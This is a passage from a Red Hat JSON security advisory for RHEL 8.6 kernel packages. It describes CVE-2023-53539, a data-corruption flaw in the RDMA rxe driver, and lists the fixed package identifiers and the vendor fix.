          "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "perf-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2023-53539",
      "discovery_date": "2025-10-04T00:00:00+00:00",
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2401510"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An incorrect state restoration flaw was found in the Linux kernel\u0027s RDMA rxe (soft-RoCE) driver in the requester packet transmission logic. \nA local user with access to RDMA devices can trigger this issue when network layer packet drops occur during RDMA send operations, causing the work queue element state to be incompletely saved and restored. This results in data corruption in resent packets, leading to denial of service or potential data integrity issues.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "kernel: RDMA/rxe: Fix incomplete state save in rxe_requester",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "The vulnerability occurs when rxe_requester attempts to retransmit a packet after receiving -EAGAIN from the IP layer. The code saves work queue element state to enable retransmission, but fails to preserve the DMA structure that tracks scatter-gather list processing. Additionally, the state snapshot happens after packet construction has already modified the DMA fields. When heavy network stress causes packet drops\u2014particularly when a fast sender communicates with a slow receiver across multiple queue pairs\u2014the incomplete restoration causes retransmitted packets to carry corrupted payload data.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2023-53539"
        },
        {
          "category": "external",
          "summary": "RHBZ#2401510",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2401510"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2023-53539",
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-53539"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-53539",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-53539"
        },
        {
          "category": "external",
          "summary": "https://lore.kernel.org/linux-cve-announce/2025100443-CVE-2023-53539-4411@gregkh/T",
          "url": "https://lore.kernel.org/linux-cve-announce/2025100443-CVE-2023-53539-4411@gregkh/T"
        }
      ],
      "release_date": "2025-10-04T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-03-25T00:45:50+00:00",
          "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
